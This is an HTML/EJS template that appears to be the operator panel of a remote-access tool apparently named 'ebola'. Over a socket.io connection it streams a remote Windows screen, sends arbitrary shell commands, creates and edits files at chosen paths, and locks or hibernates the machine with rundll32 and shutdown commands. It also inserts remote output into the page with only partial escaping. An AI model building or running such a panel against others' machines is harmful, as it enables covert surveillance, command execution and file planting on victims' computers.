<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<title>Main</title>

		<link href="https://cdn.jsdelivr.net/npm/daisyui@4.10.2/dist/full.min.css" rel="stylesheet" type="text/css" />
		<script src="https://cdn.tailwindcss.com"></script>
	</head>
	<body class="h-screen w-screen overflow-x-hidden">
		<main class="grid grid-cols-2 grid-rows-[1fr,2fr] h-full max-h-[100dvh] w-full p-6 gap-6">
			<div class="w-full h-auto col-span-2 flex items-center gap-3">
				<div class="font-medium text-3xl"><%= ebola.name %></div>
				<% if (ebola.status === 'online') { %>
				<div id="status-badge" class="badge badge-xl badge-success relative top-1"></div>
				<% } else if (ebola.status === 'offline') { %>
				<div id="status-badge" class="badge badge-xl badge-error relative top-1"></div>
				<% } %>
			</div>
			<div class="card border-2 border-primary rounded-xl h-full h-full w-full">
				<div class="min-h-2xl h-2xl aspect-video px-3 pt-3">
					<img id="stream" class="aspect-video rounded-md" />
					<span id="nodisplay" class="bg-base-300 rounded-md text-xl text-center aspect-video flex items-center justify-center"
						>No display<br />Start streaming to view remote screen</span
					>
				</div>
				<div class="control-container card-body">
					<h2 class="card-title">Control</h2>
					<div class="controls h-full card-actions flex flex-col gap-6">
						<div class="buttons flex flex-row gap-4">
							<button id="start-stream" class="btn btn-primary">Start Stream</button>
							<button id="stop-stream" class="btn">Stop Stream</button>
						</div>
						<div class="information grid my-auto grid-rows-2 auto-cols-auto grid-flow-col min-h-none min-w-none gap-x-10 gap-y-5">
							<div class="elapsed bg-base-100 overflow-hidden min-w-none rounded-md border-2 border-primary p-4">
								<label>Time Elapsed</label>
								<span id="minutes">00</span>:<span id="seconds">00</span>
							</div>
							<button class="btn btn-primary" onclick="new_file.showModal()">New File</button>
							<dialog id="new_file" class="modal">
								<div class="modal-box w-11/12 max-w-5xl min-h-[80%]">
									<h3 class="font-bold text-lg">New File</h3>
									<div class="flex flex-col items-center gap-y-6">
										<input type="text" placeholder="File Name" class="input input-bordered w-full max-w-xs" />
										<input type="text" placeholder="File Extension" class="input input-bordered w-full max-w-xs" />
										<input type="text" placeholder="File Path (example: C:\Folder\ )" class="input input-bordered w-full max-w-xs" />

										<label class="form-control w-[80%]">
											<div class="label">
												<span class="label-text">File content</span>
											</div>
											<textarea class="textarea textarea-bordered font-mono min-h-[25rem]" placeholder="Enter Content"></textarea>
										</label>
									</div>
									<div class="modal-action flex gap-x-4">
										<button class="btn btn-primary">Create</button>
										<form method="dialog">
											<button class="btn">Close</button>
										</form>
									</div>
								</div>
							</dialog>

							<div class="elapsed bg-base-100 overflow-hidden min-w-none rounded-md border-2 border-primary p-4">
								<label>Time Elapsed</label>
								<span id="minutes">00</span>:<span id="seconds">00</span>
							</div>
							<button class="btn btn-primary" onclick="edit_file.showModal()">Edit File</button>
							<dialog id="edit_file" class="modal">
								<div class="modal-box w-11/12 max-w-5xl min-h-[80%]">
									<h3 class="font-bold text-lg">Edit File</h3>
									<div class="flex flex-col items-center gap-y-6">
										<input type="text" placeholder="File Name" class="input input-bordered w-full max-w-xs" />
										<input type="text" placeholder="File Extension" class="input input-bordered w-full max-w-xs" />
										<input type="text" placeholder="File Path (example: C:\Folder\t.txt)" class="input input-bordered w-full max-w-xs" />

										<label class="form-control w-[80%]">
											<div class="label">
												<span class="label-text">File content</span>
											</div>
											<textarea class="textarea textarea-bordered font-mono min-h-[25rem]" placeholder="Enter Content"></textarea>
										</label>
									</div>
									<div class="modal-action flex gap-x-4">
										<button class="btn btn-primary">Edit</button>
										<form method="dialog">
											<button class="btn">Close</button>
										</form>
									</div>
								</div>
							</dialog>

							<div class="elapsed bg-base-100 overflow-hidden min-w-none rounded-md border-2 border-primary p-4">
								<label>Time Elapsed</label>
								<span id="minutes">00</span>:<span id="seconds">00</span>
							</div>
							<button
								class="btn btn-neutral"
								onclick="socket.emit('command_input', 'C:\\Windows\\System32\\Rundll32.exe user32.dll,LockWorkStation')">
								Lock Screen
							</button>

							<div class="elapsed bg-base-100 overflow-hidden min-w-none rounded-md border-2 border-primary p-4">
								<label>Time Elapsed</label>
								<span id="minutes">00</span>:<span id="seconds">00</span>
							</div>
							<button class="btn btn-error" onclick="socket.emit('command_input', 'shutdown/h /t 0')">Shut Down (Hibernate)</button>
						</div>
					</div>
				</div>
			</div>
			<div class="cmds gap-3 border-2 border-primary rounded-xl h-full max-h-[inherit] w-full p-3">
				<div class="log w-full h-full overflow-x-auto overflow-y-auto">
					<div id="command-log" class="font-mono border-[2px] px-2 pt-1 border-neutral rounded-md min-h-full w-full overflow-y-auto">
						<p id="cmd-prompt">
							<span class="font-bold dir">Loading...</span
							><input
								type="text"
								class="bg-transparent border-none focus:outline-none font-mono w-0"
								onkeypress="this.style.width = ((this.value.length + 1) * 9) + 'px';"
								oninput="this.style.width = ((this.value.length + 1) * 9) + 'px';" />
						</p>
					</div>
				</div>
			</div>
		</main>

		<script src="https://cdn.socket.io/4.7.5/socket.io.min.js"></script>
		<script>
			//#region socket init
			const socket = io('http://<%= ebola.host %>:<%= ebola.port %>', { transports: ['websocket'] });

			document.addEventListener('DOMContentLoaded', event => {
				let counter = 0;
				if (!socket.connected) {
					let checkConnected = setInterval(() => {
						counter += 1;

						if (counter === 10 && !socket.connected) {
							changeStatus('offline');
							clearInterval(checkConnected);
						}
					}, 100);
				}
			});

			socket.on('disconnect', async () => {
				await changeStatus('offline');
			});
			socket.on('connect', async () => {
				await changeStatus('online');
			});

			socket.on('stream_data', data => {
				document.getElementById('stream').setAttribute('src', `data:image/png;base64,${data}`);

				if (document.getElementById('stream').style.display !== 'flex') {
					document.getElementById('stream').style.display = 'flex';
					document.getElementById('nodisplay').style.display = 'none';
				}
			});

			async function changeStatus(status) {
				const badge = document.getElementById('status-badge');
				status === 'online'
					? (badge.classList.add('badge-success'), badge.classList.remove('badge-error'))
					: (badge.classList.add('badge-error'), badge.classList.remove('badge-success'));

				const data = { status: status };

				await fetch('http://localhost:4100/control/<%= ebola.name %>', {
					method: 'POST',
					body: JSON.stringify(data),
					headers: {
						'Content-Type': 'application/json',
					},
				});
			}
			//#endregion

			//#region elapsed time
			let minutesLabel = document.getElementById('minutes');
			let secondsLabel = document.getElementById('seconds');
			let totalSeconds = 0;

			function startTimeElapsed() {
				minutesLabel.innerHTML = '00';
				secondsLabel.innerHTML = '00';
				totalSeconds = 0;
				timer = setInterval(setTime, 1000);
			}
			function stopTimeElapsed() {
				clearInterval(timer);
			}

			function setTime() {
				++totalSeconds;
				secondsLabel.innerHTML = pad(totalSeconds % 60);
				minutesLabel.innerHTML = pad(parseInt(totalSeconds / 60));
			}

			function pad(val) {
				var valString = val + '';
				if (valString.length < 2) {
					return '0' + valString;
				} else {
					return valString;
				}
			}
			//#endregion

			//#region stream events
			document.addEventListener('DOMContentLoaded', event => {
				document.getElementById('stream').style.display = 'none';
			});

			document.getElementById('start-stream').addEventListener('click', () => {
				socket.emit('start_stream');
				startTimeElapsed();
				document.getElementById('stream').style.display = 'flex';
				document.getElementById('nodisplay').style.display = 'none';
			});
			document.getElementById('stop-stream').addEventListener('click', () => {
				socket.emit('stop_stream');
				stopTimeElapsed();
				setTimeout(() => {
					document.getElementById('stream').style.display = 'none';
					document.getElementById('nodisplay').style.display = 'flex';
				}, 200);
			});
			//#endregion

			//#region commands
			const commandLog = document.getElementById('command-log');
			let workingDir = 'Loading...';

			commandLog.addEventListener('click', () => {
				commandLog.querySelector('#cmd-prompt:last-child input').focus();
			});

			commandLog.addEventListener('keypress', event => {
				if (event.key === 'Enter') {
					if (event.target.value === 'clear' || event.target.value === 'cls') {
						commandLog.innerHTML = `<p id="cmd-prompt"><span class="font-bold dir">${workingDir}></span><input type="text" class="bg-transparent border-none focus:outline-none font-mono w-0" onkeypress="this.style.width = ((this.value.length + 1) * 9) + 'px';" oninput="this.style.width = ((this.value.length + 1) * 9) + 'px';" /></p>`;
					} else {
						let command = commandLog.querySelector('#cmd-prompt:last-child input').value;
						if (command.startsWith('s32')) command = command.replace('s32', 'C:\\Windows\\System32');

						socket.emit('command_input', command);
					}
					commandLog.querySelector('#cmd-prompt:last-child input').focus();
				}
			});

			socket.on('command_dir', dir => {
				workingDir = dir;
				document.querySelector('#command-log p:last-child span.dir').textContent = workingDir + '>';
			});

			socket.on('command_output', output => {
				if (output.trim().length >= 1) {
					console.log(`output normal: ${output}`);
					const re = /<(\w+)>/gm;
					const replacement = '< $1 >';
					output = output.replace(re, replacement);

					commandLog.querySelector('#cmd-prompt input').defaultValue = commandLog.querySelector('#cmd-prompt input').value;
					commandLog.innerHTML += `<p><span>${output.split('\n').join('<br>')}</span></p>`;
					commandLog.innerHTML += `<p id="cmd-prompt"><span class="font-bold dir">${workingDir}></span><input type="text" class="bg-transparent border-none focus:outline-none font-mono w-0" onkeypress="this.style.width = ((this.value.length + 1) * 9) + 'px';" oninput="this.style.width = ((this.value.length + 1) * 9) + 'px';"/></p>`;
					commandLog.querySelector('#cmd-prompt:last-child input').focus();
				}
			});
			socket.on('command_output_error', output => {
				if (output.trim().length >= 1) {
					console.log(`output error: ${output}`);
					const re = /<(\w+)>/gm;
					const replacement = '< $1 >';
					output = output.replace(re, replacement);

					commandLog.querySelector('#cmd-prompt input').defaultValue = commandLog.querySelector('#cmd-prompt input').value;
					commandLog.innerHTML += `<p><span class="text-red-500">${output.split('\n').join('<br>')}</span></p>`;
					commandLog.innerHTML += `<p id="cmd-prompt"><span class="font-bold dir">${workingDir}></span><input type="text" class="bg-transparent border-none focus:outline-none font-mono w-0" onkeypress="this.style.width = ((this.value.length + 1) * 9) + 'px';" oninput="this.style.width = ((this.value.length + 1) * 9) + 'px';" /></p>`;
					commandLog.querySelector('#cmd-prompt:last-child input').focus();
				}
			});
			//#endregion

			//#region misc
			//#endregion
		</script>
	</body>
</html>
